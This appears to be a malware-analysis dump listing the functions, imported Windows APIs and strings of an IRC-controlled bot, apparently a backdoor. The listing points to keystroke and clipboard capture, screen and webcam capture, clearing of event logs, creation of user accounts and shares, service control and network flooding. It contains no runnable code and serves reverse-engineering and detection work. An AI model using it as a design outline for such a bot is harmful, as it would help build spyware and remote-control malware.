	NTDLL.RtlGetLastWin32Error

sub_41AC88(963b):
	KERNEL32.GetTickCount

sub_40CD21(981b):
	WS2_32.ntohl
	WS2_32.send

sub_41226B(9a38):
	KERNEL32.GetLocalTime
	KERNEL32.GetSystemDirectoryA

	"\\"
	"ab"
	"[%d-%d-%d %d:%d:%d] %s\r\n"

sub_4246EE(9a80):
	KERNEL32.MultiByteToWideChar

sub_41673A(9b58):
	KERNEL32.GetSystemDirectoryA
	KERNEL32.CreateFileA
	KERNEL32.CloseHandle
	WSOCK32.recv
	WS2_32.ntohl
	WS2_32.send
	WS2_32.closesocket
	KERNEL32.ExitThread

	"a+b"

sub_419C1A(9bb4):
	"Invalid parameter."
	"Server name not found."
	"This network request is not supported."
	"Not enough memory."
	"The name is invalid."
	"Duplicate share name."
	"Invalid for redirected resource."
	"Device or directory does not exist."
	"Level	parameter is invalid."
	"A general failure occurred in	the netwo"...
	"The operation	is allowed only	on the pr"...
	"The user account already exists."
	"The group already exists."
	"The password is shorter than required	("...
	"An unknown error occurred."
	"The computer name is invalid."
	"Share	not found."
	"The user name	could not be found."
	"Network connection not found."

sub_40B04A(9c71):
	"%d. %s"

sub_418A12(9dbe):
	USER32.ExitWindowsEx

	"SeShutdownPrivilege"

sub_413A3C(9dd3):
	KERNEL32.GetTickCount
	WS2_32.socket
	WS2_32.inet_addr
	WS2_32.gethostbyname
	KERNEL32.ExitThread
	WS2_32.ntohs
	WS2_32.sendto
	KERNEL32.Sleep

sub_424FBC(9ed0):
	KERNEL32.IsBadWritePtr

sub_424FA0(9ed0):
	KERNEL32.IsBadReadPtr

sub_40CE45(a2f7):
	WS2_32.send

sub_4149E9(a33a):
	WS2_32.inet_addr
	KERNEL32.ExitThread

sub_417D1D(a46d):
	WS2_32.send

	" "
	"PING"
	"433"

sub_41D851(a551):
	KERNEL32.GetLocalTime
	KERNEL32.GetSystemTime
	KERNEL32.GetTimeZoneInformation

sub_40C415(a5b8):
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.connect
	WS2_32.inet_ntoa
	WS2_32.closesocket

sub_4206A9(a8e4):
	KERNEL32.GetOEMCP
	KERNEL32.GetCPInfo

sub_418F1A(a9bc):
	ADVAPI32.OpenSCManagerA
	NTDLL.RtlGetLastWin32Error
	ADVAPI32.OpenServiceA
	ADVAPI32.ControlService
	ADVAPI32.StartServiceA
	ADVAPI32.DeleteService
	ADVAPI32.CloseServiceHandle

sub_4FE3A1(a9e9):
	KERNEL32.LoadLibraryA

sub_409A1D(aaa2):
	KERNEL32.GetModuleHandleA
	KERNEL32.GetProcAddress
	NTDLL.RtlGetLastWin32Error
	KERNEL32.LoadLibraryA
	WININET.InternetOpenA

	"kernel32.dll"
	"SetErrorMode"
	"CreateToolhelp32Snapshot"
	"Process32First"
	"GetDiskFreeSpaceExA"
	"GetLogicalDriveStringsA"
	"SearchPathA"
	"QueryPerformanceCounter"
	"QueryPerformanceFrequency"
	"RegisterServiceProcess"
	"user32.dll"
	"SendMessageA"
	"FindWindowA"
	"IsWindow"
	"GetClipboardData"
	"CloseClipboard"
	"GetAsyncKeyState"
	"GetKeyState"
	"GetWindowTextA"
	"GetForegroundWindow"
	"advapi32.dll"
	"RegCreateKeyExA"
	"RegSetValueExA"
	"RegQueryValueExA"
	"RegDeleteValueA"
	"RegCloseKey"
	"ClearEventLogA"
	"OpenProcessToken"
	"LookupPrivilegeValueA"
	"AdjustTokenPrivileges"
	"OpenSCManagerA"
	"OpenServiceA"
	"ControlService"
	"CloseServiceHandle"
	"EnumServicesStatusA"
	"IsValidSecurityDescriptor"
	"GetUserNameA"
	"gdi32.dll"
	"CreateDCA"
	"CreateDIBSection"
	"CreateCompatibleDC"
	"GetDIBColorTable"
	"SelectObject"
	"BitBlt"
	"DeleteDC"
	"DeleteObject"
	"ws2_32.dll"
	"WSAStartup"
	"WSASocketA"
	"WSAAsyncSelect"
	"__WSAFDIsSet"
	"WSAIoctl"
	"WSAGetLastError"
	"WSACleanup"
	"socket"
	"ioctlsocket"
	"connect"
	"inet_ntoa"
	"inet_addr"
	"htons"
	"htonl"
	"ntohs"
	"ntohl"
	"send"
	"sendto"
	"recv"
	"recvfrom"
	"bind"
	"select"
	"listen"
	"accept"
	"setsockopt"
	"getsockname"
	"gethostname"
	"getpeername"
	"closesocket"
	"wininet.dll"
	"InternetGetConnectedState"
	"InternetGetConnectedStateEx"
	"HttpOpenRequestA"
	"HttpSendRequestA"
	"InternetConnectA"
	"InternetOpenUrlA"
	"InternetCrackUrlA"
	"InternetReadFile"
	"InternetCloseHandle"
	"Mozilla/4.0 (compatible)"
	"icmp.dll"
	"IcmpCreateFile"
	"IcmpCloseHandle"
	"IcmpSendEcho"
	"netapi32.dll"
	"NetShareAdd"
	"NetShareDel"
	"NetShareEnum"
	"NetScheduleJobAdd"
	"NetApiBufferFree"
	"NetRemoteTOD"
	"NetUserAdd"
	"NetUserDel"
	"NetUserEnum"
	"NetUserGetInfo"
	"NetMessageBufferSend"
	"NetWkstaGetInfo"
	"dnsapi.dll"
	"DnsFlushResolverCache"
	"DnsFlushResolverCacheEntry_A"
	"iphlpapi.dll"
	"DeleteIpNetEntry"
	"mpr.dll"
	"WNetAddConnection2A"
	"WNetAddConnection2W"
	"WNetCancelConnection2A"
	"WNetCancelConnection2W"
	"shell32.dll"
	"SHChangeNotify"
	"odbc32.dll"
	"SQLDriverConnect"
	"SQLAllocHandle"
	"avicap32.dll"
	"capCreateCaptureWindowA"
	"capGetDriverDescriptionA"

sub_40A6D9(ac3c):
	"Kernel32.dll failed. <%d>"
	"User32.dll failed. <%d>"
	"Advapi32.dll failed. <%d>"
	"Gdi32.dll failed. <%d>"
	"Ws2_32.dll failed. <%d>"
	"Wininet.dll failed. <%d>"
	"Icmp.dll failed. <%d>"
	"Netapi32.dll failed. <%d>"
	"Dnsapi.dll failed. <%d>"
	"Iphlpapi.dll failed. <%d>"
	"Mpr32.dll failed. <%d>"
	"Shell32.dll failed. <%d>"
	"Odbc32.dll failed. <%d>"
	"Avicap32.dll failed. <%d>"

sub_412CA4(ad6f):
	WS2_32.gethostname
	WS2_32.gethostbyname
	WS2_32.socket
	WS2_32.bind
	WS2_32.WSAGetLastError
	WS2_32.closesocket
	KERNEL32.ExitThread
	WS2_32.WSAIoctl
	WSOCK32.recv
	WS2_32.ntohs
	WS2_32.inet_ntoa

	"%s"
	"%s"

sub_427179(aeff):
	KERNEL32.RaiseException

sub_41E24E(af5c):
	KERNEL32.ExitProcess

sub_401132(af91):
	WS2_32.closesocket
	WS2_32.WSACleanup
	KERNEL32.Sleep
	KERNEL32.GetSystemDirectoryA
	KERNEL32.GetModuleFileNameA
	KERNEL32.CreateProcessA
	KERNEL32.CloseHandle
	KERNEL32.ExitProcess

sub_41940B(afa1):
	KERNEL32.MultiByteToWideChar

sub_4101B7(b203):
	WS2_32.send
	KERNEL32.FindFirstFileA
	KERNEL32.FindNextFileA
	KERNEL32.FileTimeToLocalFileTime
	KERNEL32.FileTimeToSystemTime
	KERNEL32.Sleep
	KERNEL32.FindClose

	"\n"
	"PRIVMSG %s :Searching	for: %s\r\n"
	"\r\n\r\n